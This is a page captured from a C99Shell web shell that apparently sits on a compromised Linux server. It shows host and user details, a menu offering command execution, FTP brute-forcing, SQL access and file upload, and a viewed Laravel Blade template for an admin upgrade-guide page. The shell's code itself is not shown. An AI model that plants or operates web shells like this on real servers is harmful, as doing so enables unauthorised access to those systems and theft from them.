!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/admin/settings/pages/   drwxr-xr-x
Free 29.31 GB of 117.98 GB (24.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     upgrade-guide.blade.php (1.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.settings.setting-layout')
@section('title')
    {{ __('upgrade_guide') }}
@endsection

@section('website-settings')
    <div class="card">
        <div class="card-header d-flex justify-content-between">
            <h3 class="card-title" style="line-height: 36px;">{{ __('upgrade_guide') }}</h3>
            <strong>Current version {{ config('app.version') }}</strong>
        </div>
        <div class="card-body">
            <div class="alert alert-info">
                <ul class="mb-0">
                    <li class="">
                        Applicaion current version <strong>{{ config('app.version') }}</strong>
                        <a target="_blank" href="https://templatecookie.com/docs/adlisting/others/changealog">Check here to see latest version</a>
                    </li>
                    <li class="">
                        Get the most recent product zip file by visiting this page
                        <a target="_blank" href="https://codecanyon.net/downloads">Check Here</a>
                    </li>
                    <li class="">Extract downloaded zip file and find app.zip file</li>
                    <li class="">Put that app.zip file in the server's application root directory.</li>
                    <li class="">Extract app.zip (it will replace the most recent update in your application).</li>
                    <li class="">Finally click the below "Upgrade Now" button</li>
                </ul>
            </div>
        </div>
        <div class="card-footer text-center">
            <form action="{{ route('settings.upgrade.apply') }}" method="POST">
                @csrf
                <button onclick="return confirm('Would you like to upgrade your application ?')" style="width: 250px;" type="submit" class="btn btn-primary">{{ __('upgrade_now') }}</button>
            </form>
        </div>
    </div>
@endsection


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.003 ]--